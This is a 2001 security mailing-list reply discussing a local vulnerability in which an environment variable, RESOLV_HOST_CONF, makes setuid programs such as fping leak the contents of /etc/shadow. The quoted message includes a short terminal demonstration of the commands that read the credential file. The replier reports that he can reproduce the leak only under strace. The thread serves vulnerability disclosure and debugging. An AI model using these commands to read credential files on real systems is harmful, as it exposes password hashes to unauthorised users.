Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
On Mon, Jan 08, 2001 at 05:57:23PM +0000, thomas lakofski wrote:
> Since I've not had any response yet, I thought I'd give a demonstration of how
> nasty this is:
>
> Script started on Mon Jan 8 17:48:23 2001
> thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
> thomas@io:~$ ping localhost
> PING localhost (127.0.0.1): 56 data bytes
>
> --- localhost ping statistics ---
> 2 packets transmitted, 0 packets received, 100% packet loss
> thomas@io:~$ fping localhost
> /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'
>
> [snip]
Most weird. I get this behaviour when running through a setuid root
strace, but I don't get the error messages (and hence the content of
/etc/shadow) when I don't use strace. I'm still running potato.
Julian
--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Julian Gilbey, Dept of Maths, Queen Mary, Univ. of London
Debian GNU/Linux Developer, see http://people.debian.org/~jdg
Donate free food to the world's hungry: see http://www.thehungersite.com/
Reply to: